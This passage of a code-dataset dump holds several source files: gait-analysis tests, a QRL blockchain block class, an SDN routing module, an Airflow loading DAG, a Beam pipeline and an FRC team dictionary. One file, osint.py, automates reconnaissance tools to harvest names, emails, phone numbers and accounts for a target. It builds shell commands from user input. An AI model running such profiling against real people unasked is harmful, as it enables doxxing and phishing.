df_expected.values)\n\n testing.assert_allclose(interpolated.values, df_expected.values)\n testing.assert_allclose(interpolated.index.values.astype(float),\n df_expected.index.values.astype(float))\n\n\nclass TestWalkingData():\n\n def setup(self):\n\n time = time_vector(1000, 100)\n\n omega = 2 * np.pi\n\n right_grf = 1000 * (0.75 + np.sin(omega * time))\n right_grf[right_grf < 0.0] = 0.0\n right_grf += 2.0 * np.random.normal(size=right_grf.shape)\n\n left_grf = 1000 * (0.75 + np.cos(omega * time))\n left_grf[left_grf < 0.0] = 0.0\n left_grf += 2.0 * np.random.normal(size=left_grf.shape)\n\n right_knee_angle = np.arange(len(time))\n right_knee_moment = np.arange(len(time))\n\n self.data_frame = \\\n pandas.DataFrame({'Right Vertical GRF': right_grf,\n 'Left Vertical GRF': left_grf,\n 'Right Knee Angle': right_knee_angle,\n 'Right Knee Moment': right_knee_moment},\n index=time)\n\n self.threshold = 10.0\n\n def test_init(self):\n\n walking_data = WalkingData(self.data_frame)\n\n assert walking_data.raw_data is self.data_frame\n\n def test_grf_landmarks(self, plot=False):\n\n walking_data = WalkingData(self.data_frame)\n\n right_strikes, left_strikes, right_offs, left_offs = \\\n walking_data.grf_landmarks('Right Vertical GRF',\n 'Left Vertical GRF',\n threshold=self.threshold,\n do_plot=plot)\n\n right_zero = self.data_frame['Right Vertical GRF'] < self.threshold\n instances = right_zero.apply(lambda x: 1 if x else 0).diff()\n expected_right_offs = \\\n instances[instances == 1].index.values.astype(float)\n expected_right_strikes = \\\n instances[instances == -1].index.values.astype(float)\n\n left_zero = self.data_frame['Left Vertical GRF'] < self.threshold\n instances = left_zero.apply(lambda x: 1 if x else 0).diff()\n expected_left_offs = \\\n instances[instances == 1].index.values.astype(float)\n expected_left_strikes = \\\n instances[instances == -1].index.values.astype(float)\n\n testing.assert_allclose(expected_right_offs, right_offs)\n testing.assert_allclose(expected_right_strikes, right_strikes)\n\n testing.assert_allclose(expected_left_offs, left_offs)\n testing.assert_allclose(expected_left_strikes, left_strikes)\n\n def test_split_at(self, plot=False):\n\n walking_data = WalkingData(self.data_frame)\n walking_data.grf_landmarks('Right Vertical GRF',\n 'Left Vertical GRF',\n threshold=self.threshold)\n\n side = 'right'\n series = 'Right Vertical GRF'\n\n steps = walking_data.split_at('right')\n\n for i, step in steps.iteritems():\n start_step = walking_data.strikes[side][i]\n end_step = walking_data.strikes[side][i + 1]\n testing.assert_allclose(step[series],\n walking_data.raw_data[series][start_step:end_step])\n\n if plot is True:\n walking_data.plot_steps(series, 'Left Vertical GRF')\n\n steps = walking_data.split_at(side, 'stance')\n\n for i, step in steps.iteritems():\n start_step = walking_data.strikes[side][i]\n end_step = walking_data.offs[side][i + 1]\n testing.assert_allclose(step[series],\n walking_data.raw_data[series][start_step:end_step])\n\n if plot is True:\n walking_data.plot_steps(series, 'Left Vertical GRF')\n\n steps = walking_data.split_at(side, 'swing')\n\n for i, step in steps.iteritems():\n start_step = walking_data.offs[side][i]\n end_step = walking_data.strikes[side][i]\n testing.assert_allclose(step[series],\n walking_data.raw_data[series][start_step:end_step])\n\n if plot is True:\n walking_data.plot_steps(series, 'Left Vertical GRF')\n import matplotlib.pyplot as plt\n plt.show()\n\n def test_plot_steps(self):\n\n walking_data = WalkingData(self.data_frame)\n walking_data.grf_landmarks('Right Vertical GRF',\n 'Left Vertical GRF',\n threshold=self.threshold)\n walking_data.split_at('right')\n\n assert_raises(ValueError, walking_data.plot_steps)\n\n\n","sub_path":"gaitanalysis/test/test_gait.py","file_name":"test_gait.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"480361586","text":"# coding=utf-8\r\n# Distributed under the MIT software license, see the accompanying\r\n# file LICENSE or http://www.opensource.org/licenses/mit-license.php.\r\nfrom collections import OrderedDict\r\n\r\nfrom google.protobuf.json_format import MessageToJson, Parse\r\nfrom pyqrllib.pyqrllib import bin2hstr\r\n\r\nfrom qrl.core import config\r\nfrom qrl.core.misc import logger, ntp\r\nfrom qrl.core.txs.Transaction import Transaction\r\nfrom qrl.core.txs.CoinBase import CoinBase\r\nfrom qrl.core.BlockHeader import BlockHeader\r\nfrom qrl.crypto.misc import merkle_tx_hash\r\nfrom qrl.generated import qrl_pb2\r\n\r\n\r\nclass Block(object):\r\n def __init__(self, protobuf_block=None):\r\n self._data = protobuf_block\r\n if protobuf_block is None:\r\n self._data = qrl_pb2.Block()\r\n\r\n self.blockheader = BlockHeader(self._data.header)\r\n\r\n def __eq__(self, other):\r\n equality = (self.block_number == other.block_number) and (self.headerhash == other.headerhash) and (\r\n self.prev_headerhash == other.prev_headerhash) and (self.timestamp == other.timestamp) and (\r\n self.mining_nonce == other.mining_nonce)\r\n return equality\r\n\r\n @property\r\n def size(self):\r\n return self._data.ByteSize()\r\n\r\n @property\r\n def pbdata(self):\r\n \"\"\"\r\n Returns a protobuf object that contains persistable data representing this object\r\n :return: A protobuf Block object\r\n :rtype: qrl_pb2.Block\r\n \"\"\"\r\n return self._data\r\n\r\n @property\r\n def block_number(self):\r\n return self.blockheader.block_number\r\n\r\n @property\r\n def epoch(self):\r\n return int(self.block_number // config.dev.blocks_per_epoch)\r\n\r\n @property\r\n def headerhash(self):\r\n return self.blockheader.headerhash\r\n\r\n @property\r\n def prev_headerhash(self):\r\n return self.blockheader.prev_headerhash\r\n\r\n @property\r\n def transactions(self):\r\n return self._data.transactions\r\n\r\n @property\r\n def mining_nonce(self):\r\n return self.blockheader.mining_nonce\r\n\r\n @property\r\n def block_reward(self):\r\n return self.blockheader.block_reward\r\n\r\n @property\r\n def fee_reward(self):\r\n return self.blockheader.fee_reward\r\n\r\n @property\r\n def timestamp(self):\r\n return self.blockheader.timestamp\r\n\r\n @property\r\n def mining_blob(self) -> bytes:\r\n return self.blockheader.mining_blob\r\n\r\n @property\r\n def mining_nonce_offset(self) -> bytes:\r\n return self.blockheader.nonce_offset\r\n\r\n @staticmethod\r\n def from_json(json_data):\r\n pbdata = qrl_pb2.Block()\r\n Parse(json_data, pbdata)\r\n return Block(pbdata)\r\n\r\n def verify_blob(self, blob: bytes) -> bool:\r\n return self.blockheader.verify_blob(blob)\r\n\r\n def set_nonces(self, mining_nonce, extra_nonce=0):\r\n self.blockheader.set_nonces(mining_nonce, extra_nonce)\r\n self._data.header.MergeFrom(self.blockheader.pbdata)\r\n\r\n def to_json(self) -> str:\r\n # FIXME: Remove once we move completely to protobuf\r\n return MessageToJson(self._data, sort_keys=True)\r\n\r\n def serialize(self) -> str:\r\n return self._data.SerializeToString()\r\n\r\n @staticmethod\r\n def deserialize(data):\r\n pbdata = qrl_pb2.Block()\r\n pbdata.ParseFromString(bytes(data))\r\n block = Block(pbdata)\r\n return block\r\n\r\n @staticmethod\r\n def _copy_tx_pbdata_into_block(block, tx):\r\n block._data.transactions.extend([tx.pbdata])\r\n\r\n @staticmethod\r\n def create(block_number: int,\r\n prev_headerhash: bytes,\r\n prev_timestamp: int,\r\n transactions: list,\r\n miner_address: bytes):\r\n\r\n block = Block()\r\n\r\n # Process transactions\r\n hashedtransactions = []\r\n fee_reward = 0\r\n\r\n for tx in transactions:\r\n fee_reward += tx.fee\r\n\r\n # Prepare coinbase tx\r\n total_reward_amount = BlockHeader.block_reward_calc(block_number) + fee_reward\r\n coinbase_tx = CoinBase.create(total_reward_amount, miner_address, block_number)\r\n hashedtransactions.append(coinbase_tx.txhash)\r\n Block._copy_tx_pbdata_into_block(block, coinbase_tx) # copy memory rather than sym link\r\n\r\n for tx in transactions:\r\n hashedtransactions.append(tx.txhash)\r\n Block._copy_tx_pbdata_into_block(block, tx) # copy memory rather than sym link\r\n\r\n txs_hash = merkle_tx_hash(hashedtransactions) # FIXME: Find a better name, type changes\r\n\r\n tmp_blockheader = BlockHeader.create(blocknumber=block_number,\r\n prev_headerhash=prev_headerhash,\r\n prev_timestamp=prev_timestamp,\r\n hashedtransactions=txs_hash,\r\n fee_reward=fee_reward)\r\n\r\n block.blockheader = tmp_blockheader\r\n\r\n block._data.header.MergeFrom(tmp_blockheader.pbdata)\r\n\r\n block.set_nonces(0, 0)\r\n\r\n return block\r\n\r\n def update_mining_address(self, mining_address: bytes):\r\n coinbase_tx = Transaction.from_pbdata(self.transactions[0])\r\n coinbase_tx.update_mining_address(mining_address)\r\n hashedtransactions = []\r\n\r\n for tx in self.transactions:\r\n hashedtransactions.append(tx.transaction_hash)\r\n\r\n self.blockheader.update_merkle_root(merkle_tx_hash(hashedtransactions))\r\n\r\n self._data.header.MergeFrom(self.blockheader.pbdata)\r\n\r\n def validate(self, chain_manager, future_blocks: OrderedDict) -> bool:\r\n if chain_manager.get_block_is_duplicate(self):\r\n logger.warning('Duplicate Block #%s %s', self.block_number, bin2hstr(self.headerhash))\r\n return False\r\n\r\n parent_block = chain_manager.get_block(self.prev_headerhash)\r\n\r\n # If parent block not found in state, then check if its in the future block list\r\n if not parent_block:\r\n try:\r\n parent_block = future_blocks[self.prev_headerhash]\r\n except KeyError:\r\n logger.warning('Parent block not found')\r\n logger.warning('Parent block headerhash %s', bin2hstr(self.prev_headerhash))\r\n return False\r\n\r\n if not self._validate_parent_child_relation(parent_block):\r\n logger.warning('Failed to validate blocks parent child relation')\r\n return False\r\n\r\n if not chain_manager.validate_mining_nonce(self.blockheader):\r\n logger.warning('Failed PoW Validation')\r\n return False\r\n\r\n if len(self.transactions) == 0:\r\n return False\r\n\r\n try:\r\n coinbase_txn = Transaction.from_pbdata(self.transactions[0])\r\n coinbase_amount = coinbase_txn.amount\r\n\r\n if not coinbase_txn.validate_extended(self.block_number):\r\n return False\r\n\r\n except Exception as e:\r\n logger.warning('Exception %s', e)\r\n return False\r\n\r\n # Build transaction merkle tree, calculate fee reward, and then see if BlockHeader also agrees.\r\n hashedtransactions = []\r\n\r\n for tx in self.transactions:\r\n tx = Transaction.from_pbdata(tx)\r\n hashedtransactions.append(tx.txhash)\r\n\r\n fee_reward = 0\r\n for index in range(1, len(self.transactions)):\r\n fee_reward += self.transactions[index].fee\r\n\r\n if not self.blockheader.validate(fee_reward, coinbase_amount, merkle_tx_hash(hashedtransactions)):\r\n return False\r\n\r\n return True\r\n\r\n def apply_state_changes(self, address_txn: dict) -> bool:\r\n coinbase_tx = Transaction.from_pbdata(self.transactions[0])\r\n\r\n if not coinbase_tx.validate_extended(self.block_number):\r\n logger.warning('Coinbase transaction failed')\r\n return False\r\n\r\n coinbase_tx.apply_state_changes(address_txn)\r\n\r\n len_transactions = len(self.transactions)\r\n for tx_idx in range(1, len_transactions):\r\n tx = Transaction.from_pbdata(self.transactions[tx_idx])\r\n\r\n if isinstance(tx, CoinBase):\r\n logger.warning('Found another coinbase transaction')\r\n return False\r\n\r\n if not tx.validate():\r\n return False\r\n\r\n addr_from_pk_state = address_txn[tx.addr_from]\r\n addr_from_pk = Transaction.get_slave(tx)\r\n if addr_from_pk:\r\n addr_from_pk_state = address_txn[addr_from_pk]\r\n\r\n if not tx.validate_extended(address_txn[tx.addr_from], addr_from_pk_state):\r\n return False\r\n\r\n expected_nonce = addr_from_pk_state.nonce + 1\r\n\r\n if tx.nonce != expected_nonce:\r\n logger.warning('nonce incorrect, invalid tx')\r\n logger.warning('subtype: %s', tx.type)\r\n logger.warning('%s actual: %s expected: %s', tx.addr_from, tx.nonce, expected_nonce)\r\n return False\r\n\r\n if addr_from_pk_state.ots_key_reuse(tx.ots_key):\r\n logger.warning('pubkey reuse detected: invalid tx %s', bin2hstr(tx.txhash))\r\n logger.warning('subtype: %s', tx.type)\r\n return False\r\n\r\n tx.apply_state_changes(address_txn)\r\n\r\n return True\r\n\r\n def is_future_block(self) -> bool:\r\n if self.timestamp > ntp.getTime() + config.dev.block_max_drift:\r\n return True\r\n\r\n return False\r\n\r\n def _validate_parent_child_relation(self, parent_block) -> bool:\r\n return self.blockheader.validate_parent_child_relation(parent_block)\r\n","sub_path":"src/qrl/core/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"479222985","text":"import collections\n\nimport networkx as nx\nimport inject\nimport random\n\n\nclass SDNTopologyResolution(object):\n def __init__(self, controller_handler=None, logger=None):\n self.controller = controller_handler\n self.switches_list = []\n self.graph = None\n self.diGraph = None\n self.edges = None\n self.topology = None\n self._logger = logger\n self.switches_ports = dict()\n self.connected_edges = dict()\n self.leaf_switches_list = []\n self.in_out_ports = dict()\n\n self.build_graph()\n\n @property\n def logger(self):\n if self._logger is None:\n try:\n self._logger = inject.instance('logger')\n except:\n raise Exception('SDNRoutingResolution', 'Logger is none or empty')\n return self._logger\n\n def build_graph(self):\n self.graph = nx.Graph()\n self.diGraph = nx.DiGraph()\n\n self.get_topology()\n self.get_switches()\n self.get_edges()\n\n self.get_leaf_switches()\n\n nodeProperties = self.switches_list\n nodes = nodeProperties['nodeProperties']\n\n for node in nodes:\n self.graph.add_node(node['node']['id'])\n self.diGraph.add_node(node['node']['id'])\n self.build_edges_structure()\n\n def get_topology(self):\n self.topology = self.controller.get_query('topology', '')\n\n def get_switches(self):\n self.switches_list = self.controller.get_query('switchmanager', '/nodes')\n\n def get_edges(self):\n edgeProperties = self.topology\n self.edges = edgeProperties['edgeProperties']\n\n for edge in self.edges:\n e = (edge['edge']['headNodeConnector']['node']['id'], edge['edge']['tailNodeConnector']['node']['id'])\n self.graph.add_edge(*e)\n self.diGraph.add_edge(*e)\n\n def get_leaf_switches(self):\n leaf_switches_tuple = self.lowest_centrality(nx.betweenness_centrality(self.graph, endpoints=True))\n map(lambda x: self.leaf_switches_list.append(x[1]) if x[1] not in self.leaf_switches_list else False,\n leaf_switches_tuple)\n return self.leaf_switches_list\n\n def lowest_centrality(self, centrality_dict):\n cent_items = [(b, a) for (a, b) in centrality_dict.iteritems() if b == min(centrality_dict.values())]\n cent_items.sort()\n return cent_items\n\n def get_routing_path_between_two_endpoints(self, srcNode, dstNode):\n path = nx.dijkstra_path(self.graph, srcNode, dstNode)\n return path\n\n def get_switches_ports(self):\n for switch_id in self.leaf_switches_list:\n connectors = self.controller.get_query('switchmanager', '/node/OF/{}'.format(switch_id))\n self.switches_ports[switch_id] = {}\n for connector in connectors[\"nodeConnectorProperties\"]:\n if \"bandwidth\" not in connector['properties']:\n continue # connector is a switch itself, skip it\n\n port_name = connector['properties']['name']['value']\n\n for edge in self.edges:\n if port_name == edge['properties']['name']['value']:\n break # exclude trunk ports\n else:\n self.switches_ports[switch_id][connector[\"nodeconnector\"][\"id\"]] = {\n \"bandwidth\": connector['properties']['bandwidth']['value'],\n \"name\": port_name\n }\n\n return self.switches_ports\n\n def build_edges_structure(self):\n for edge in self.edges:\n headedge_id = edge['edge']['headNodeConnector']['node']['id']\n tailedge_id = edge['edge']['tailNodeConnector']['node']['id']\n if not (self.connected_edges.get(headedge_id)):\n self.connected_edges[headedge_id] = {}\n self.connected_edges[headedge_id].update({tailedge_id: {\"out_port\": edge['edge']['headNodeConnector']['id'], \\\n \"in_port\": edge['edge']['tailNodeConnector'][\n 'id']}})\n\n def build_ports(self):\n for edge in self.edges:\n headedge_id = edge['edge']['headNodeConnector']['node']['id']\n tailedge_id = edge['edge']['tailNodeConnector']['node']['id']\n self.in_out_ports[headedge_id + \"-\" + tailedge_id] = edge['edge']['tailNodeConnector']['id']\n\n def compute_the_route_with_ports(self, src_switch, src_switch_port, dst_switch, dst_switch_port, route):\n json_dict = collections.OrderedDict()\n self.build_ports()\n\n route_len = len(route)\n head_to_tail = ''\n\n for indx, switch in enumerate(route):\n if (self.connected_edges.get(switch)):\n for tailswitch in self.connected_edges[switch]:\n if (indx + 1 < route_len):\n if (tailswitch == route[indx + 1]):\n if (indx != 0):\n head_to_tail = route[indx - 1] + \"-\" + switch\n\n if (src_switch == switch):\n\n json_dict.update({switch: {\"in_port\": src_switch_port, \"out_port\": \\\n self.connected_edges[switch][tailswitch]['out_port']}})\n\n else:\n json_dict.update({switch: {\"in_port\": self.in_out_ports[head_to_tail], \"out_port\": \\\n self.connected_edges[switch][tailswitch]['out_port']}})\n else:\n if (indx != 0):\n head_to_tail = route[indx - 1] + \"-\" + switch\n if (dst_switch == switch):\n json_dict.update({switch: {\"in_port\": self.in_out_ports[head_to_tail], \"out_port\": \\\n dst_switch_port}})\n return json_dict\n\n def return_route_with_ports(self, src_switch, src_switch_port, dst_switch, dst_switch_port, route):\n path = self.get_routing_path_between_two_endpoints(src_switch, dst_switch)\n path_with_ports = self.compute_the_route_with_ports(src_switch, src_switch_port, dst_switch, dst_switch_port,\n route)\n return path_with_ports\n\n\ndef uniqueid():\n seed = random.getrandbits(32)\n while True:\n yield seed\n seed += 1\n","sub_path":"cloudshell/networking/sdn/resolution/topology_resolution.py","file_name":"topology_resolution.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"115517569","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport airflow\nimport os\nfrom datetime import datetime, timedelta\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow import DAG\nfrom airflow import models\nfrom airflow.settings import Session\nimport logging\n\n\nDAG_DEFAULT_ARGS = dict(owner='Gamma',\n depends_on_past=True,\n start_date=airflow.utils.dates.days_ago(2),\n provide_context=True,\n retries=5,\n retry_delay=timedelta(minutes=1))\n\ndag = DAG('LoadData',\n default_args=DAG_DEFAULT_ARGS,\n schedule_interval=\"@once\",\n concurrency=5)\n\nt_create_tables = PostgresOperator(task_id=\"create_tables\",\n postgres_conn_id='psql_conn',\n sql=open('/warehouse/sql/ddl/create_tables.pgsql').read(),\n dag=dag)\n\nt_game_day = PostgresOperator(task_id=\"load_game_day\",\n postgres_conn_id='psql_conn',\n sql=\"copy game_data from '/warehouse/data/raw/game_data.csv' delimiter ',' CSV HEADER;\",\n dag=dag)\n\nt_play_info = PostgresOperator(task_id=\"load_play_info\",\n postgres_conn_id='psql_conn',\n sql=\"copy play_info from '/warehouse/data/raw/play_information.psv' delimiter '|' CSV HEADER;\",\n dag=dag)\n\nt_play_player_role = PostgresOperator(task_id=\"load_play_player_role\",\n postgres_conn_id='psql_conn',\n sql=\"copy play_player_role from '/warehouse/data/raw/play_player_role_data.csv' delimiter ',' CSV HEADER;\",\n dag=dag)\n\nt_player_punt_data = PostgresOperator(task_id=\"load_player_punt_data\",\n postgres_conn_id='psql_conn',\n sql=\"copy player_punt_data from '/warehouse/data/raw/player_punt_data.csv' delimiter ',' CSV HEADER;\",\n dag=dag)\n\nt_video_footage_control = PostgresOperator(task_id=\"load_video_footage_control\",\n postgres_conn_id='psql_conn',\n sql=\"copy video_footage_control from '/warehouse/data/raw/video_footage-control.psv' delimiter '|' CSV HEADER;\",\n dag=dag)\n\nt_video_footage_injury = PostgresOperator(task_id=\"load_video_footage_injury\",\n postgres_conn_id='psql_conn',\n sql=\"copy video_footage_injury from '/warehouse/data/raw/video_footage-injury.psv' delimiter '|' CSV HEADER;\",\n dag=dag)\n\nt_video_review = PostgresOperator(task_id=\"load_video_review\",\n postgres_conn_id='psql_conn',\n sql=\"copy video_review from '/warehouse/data/raw/video_review.csv' delimiter ',' CSV HEADER;\",\n dag=dag)\n\nt_create_tables >> t_game_day\nt_create_tables >> t_play_info\nt_create_tables >> t_play_player_role\nt_create_tables >> t_player_punt_data\nt_create_tables >> t_video_footage_control\nt_create_tables >> t_video_footage_injury\nt_create_tables >> t_video_review\n\n# LOAD NGL DATA\npth = '/warehouse/data/raw'\nfiles = [os.path.join(pth, f) for f in os.listdir(pth) if 'ngs' in f.lower()]\ntemplate = \"copy ngs_data from '{}' delimiter ',' CSV HEADER;\"\nscripts = [template.format(f) for f in files]\n\n# Load sequentially\nfor i,script in enumerate(scripts):\n if i==0:\n t_a = PostgresOperator(task_id=\"load_ngs_{}\".format(i),\n postgres_conn_id='psql_conn',\n sql=script,\n dag=dag)\n t_create_tables >> t_a \n else:\n t_b = PostgresOperator(task_id=\"load_ngs_{}\".format(i),\n postgres_conn_id='psql_conn',\n sql=script,\n dag=dag)\n t_a >> t_b \n t_a = t_b","sub_path":"warehouse/dags/LoadData.py","file_name":"LoadData.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"228092089","text":"import argparse\n\nimport os\nimport sys\nimport re\n\n\nmy_parser = argparse.ArgumentParser(description='Automatisation des outils OSINT')\n\nmy_parser.add_argument('-u', metavar='Nom d\\'utilisateur', type=str, help='Le nom d\\'utilisateur de scan')\nmy_parser.add_argument('-d', metavar='Nom de domaine', type=str, help='Nom de domaine de scan')\nmy_parser.add_argument('-e', metavar='Adresse email',type=str, help='Adresse email de scan')\n\nargs=my_parser.parse_args()\n\n\nregex_domaine = \"^((?!-)[A-Za-z0-9-]\" +\"{1,63}(?.')\n else : \n os.chdir(os.getcwd()+'/metagoofil')\n os.system(\"python3 metagoofil.py -d \"+donnee+\" -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -o MetagoofilResults\") \n os.chdir('..')\n os.chdir(os.getcwd()+'/theHarvester')\n os.system(\"python3 theHarvester.py -d \"+donnee+\" -g -p -s --screenshot theHarvesterSSResults -v -f theHarvesterResults -b all\")\n os.chdir('..')\n os.chdir(os.getcwd()+'/spiderfoot')\n os.system(\"python3 ./sf.py -m sfp_spider,sfp_names,sfp_email,sfp_phone -s \"+donnee+\" -q -F HUMAN_NAME,EMAILADDR,PHONE_NUMB\")\n os.chdir('..')\n os.chdir(os.getcwd()+'/recon-ng')\n str=' '+donnee+'\\n'\n temp = open('temp1.txt', \"w+\")\n with open('domain_file', 'r') as f:\n for line in f:\n if line.startswith('options set SOURCE'):line = line.strip() + str\n temp.write(line)\n temp.close()\n #shutil.move('temp.txt', 'username_file.txt')\n os.system(\"python3 recon-ng -r temp1.txt\")\n os.chdir('..')\n \nif args.u:\n donnee=args.u\n if not re.search(regex_username, donnee):\n print('Le nom d\\'utilisateur saisie est incorrect.\\nUn nom d\\'utilisateur doit commencer un caractere et ne contient pas les symboles.')\n else:\n os.chdir(os.getcwd()+'/spiderfoot')\n os.system(\"python3 ./sf.py -m sfp_spider,sfp_accounts -s \\\"\"+donnee+\"\\\" -q -n\")\n os.chdir('..')\n os.chdir(os.getcwd()+'/sherlock')\n #print(os.getcwd())\n os.system(\"python3 sherlock \"+donnee+\" -o SherlockResults \")\n os.chdir('..')\n os.chdir(os.getcwd()+'/recon-ng')\n str=' '+donnee+'\\n'\n temp = open('temp.txt', \"w+\")\n with open('username_file', 'r') as f:\n for line in f:\n if line.startswith('options set SOURCE'):line = line.strip() + str\n temp.write(line)\n temp.close()\n #shutil.move('temp.txt', 'username_file.txt')\n os.system(\"python3 recon-ng -r temp.txt\")\n os.chdir('..')\n \nif args.e:\n donnee=args.e\n if not re.search(regex_email, donnee):\n print('L\\'adresse email saisie est incorrecte.\\nL\\'adresse email doit etre sur la forme Abc123_@example.com')\n else:\n os.chdir(os.getcwd()+'/spiderfoot')\n os.system(\"python3 ./sf.py -m sfp_spider,sfp_crawlr,sfp_format,sfp_email,sfp_hunter -s \"+donnee+\" -q -F HUMAN_NAME,EMAILADDR,PHONE_NUMB\")\n os.chdir('..')","sub_path":"OSINT/osint.py","file_name":"osint.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512224551","text":"# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"`data_ingestion.py` is a Dataflow pipeline which reads a file and writes its\ncontents to a BigQuery table.\nThis example does not do any transformation on the data.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport argparse\nimport json\nimport logging\nimport re\nimport apache_beam as beam\n\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.io.gcp.internal.clients import bigquery\n\nfrom google.protobuf.json_format import MessageToDict\nfrom google.protobuf.json_format import MessageToJson\n\nfrom protos import addressbook_pb2\n\nclass JsonCoder(object):\n \"\"\"A JSON coder interpreting each line as a JSON string.\"\"\"\n\n def encode(self, x):\n return json.dumps(x)\n\n def decode(self, x):\n return json.loads(x)\n\nclass ProtoToDict(beam.DoFn):\n def process(self, element):\n person = addressbook_pb2.Person()\n person.ParseFromString(element)\n yield MessageToDict(person)\n\n\ndef run(argv=None):\n \"\"\"The main function which creates the pipeline and runs it.\"\"\"\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--input',\n dest='input',\n required=False,\n help='Input file to read. This can be a local file or '\n 'a file in a Google Storage Bucket.',\n default='gs://jk-bq-dev-datasets/test.tfrecords')\n\n parser.add_argument('--output',\n dest='output',\n required=False,\n help='Output BQ table to write results to.',\n default='sandbox.person')\n\n known_args, pipeline_args = parser.parse_known_args(argv)\n\n table_spec = known_args.output \n\n\n# p = beam.Pipeline(options=PipelineOptions(pipeline_args))\n# _ = (p\n with beam.Pipeline(options=PipelineOptions(pipeline_args)) as p:\n (p\n | 'Read from a TFRecords' >> beam.io.ReadFromTFRecord(known_args.input)\n | 'Transform to Dict' >> beam.ParDo(ProtoToDict())\n | 'Write to BigQuery' >> beam.io.WriteToBigQuery(\n table_spec,\n #schema=table_schema,\n write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND,\n create_disposition=beam.io.BigQueryDisposition.CREATE_NEVER))\n\n# p.run().wait_until_finish()\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n","sub_path":"beam/proto_to_bq/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"401425167","text":"def add_team():\n\ttemp_team_dictionary = {}\n\n\tteam_number = int(input(\"What is your team's team number? \"))\n\t\n\ttemp_team_dictionary[\"team_name\"] = input(\"What is your team's name? \")\n\ttemp_team_dictionary[\"robot_name\"] = input(\"What is your robot's name? \")\n\ttemp_team_dictionary[\"robot_p_language\"] = input(\"What is your robot's programming language? \")\n\ttemp_team_dictionary[\"robot_width\"] = input(\"What is your robot's width? \")\n\ttemp_team_dictionary[\"robot_height\"] = input(\"What is your robot's height? \")\n\ttemp_team_dictionary[\"robot_camera\"] = input(\"Does your robot have a camera vision system? \")\n\ttemp_team_dictionary[\"robot_drivetrain\"] = int(input(\"How many drivetrain motors does your robot have? \"))\n\t\n\tteams[team_number] = temp_team_dictionary\n\ndef view_or_modify_team(team_view):\n\tif team_view in teams:\n\t\tinformation_category = input(\"What category would you like to view or modify? \")\n\t\tif information_category in teams[team_view]:\n\t\t\tprint(teams[team_view][information_category])\n\t\t\tnew_info = input(\"What would you like to change this value to? \")\n\t\t\tteams[team_view][information_category] = new_info\n\t\telse:\n\t\t\tprint(\"This is not an information category.\")\n\telse:\n\t\tprint(\"This is not an existing team number.\")\n\ndef remove_team(delete_team):\n\tif delete_team in teams:\n\t\tteams.pop(delete_team, None)\n\telse:\n\t\tprint(\"This is not an existing team number.\")\n\ndef search_team(search_teams):\n\tfor team, category in teams.items():\n\t\tfound_team = False\n\t\tif search_teams == category[\"team_name\"]:\n\t\t\tprint(\"This is an existing team in the dictionary.\")\n\t\t\tfound_team = True\n\t\t\tbreak\n\t\telif search_teams[0].isdigit() and int(search_teams) == team:\n\t\t\tprint(\"This is an existing team in the dictionary.\")\n\t\t\tfound_team = True\n\t\t\tbreak\n\tif found_team != True:\n\t\tprint(\"This is not an existing team.\")\n\ndef list_team():\n\tfor team in teams.keys():\n\t\tprint(team)\n\tprint(\"These are the current teams in the dictionary.\")\n\nteams = {\n\t1678 : {\n\t\t\"team_name\" : \"Citrus Circuits\",\n\t\t\"location\" : \"Davis, CA\", \n\t\t\"rookie_year\" : 2005, \n\t\t\"competed_in_2019_season\" : True, \n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"Central Valley Regional\" : \"Fresno, CA\",\n\t\t\t\"Sacramento Regional\" : \"Davis, CA\",\n\t\t\t\"Aerospace Valley Regional\" : \"Lancaster, CA\",\n\t\t\t\"Carver Division\" : \"Houston, TX\",\n\t\t\t\"Einstein Field\" : \"Houston, TX\",\n\t\t\t\"RCC Qianjiang International Robotics Invitational\" : \"Hangzhou, Zhejiang, China\",\n\t\t\t\"Chezy Champs\" : \"San Jose, CA\"\n\t\t},\n\t\t\"2019_season_awards\" : [\n\t\t\t\"Regional Chairman's Award At Central Valley Regional\",\n\t\t\t\"Regional Winners At Central Valley Regional\",\n\t\t\t\"FIRST Dean's List Finalist Award\",\n\t\t\t\"Regional Winners At Sacramento Regional\",\n\t\t\t\"Industrial Design Award Sponsored By General Motors\",\n\t\t\t\"Regional Winners At Aerospace Valley 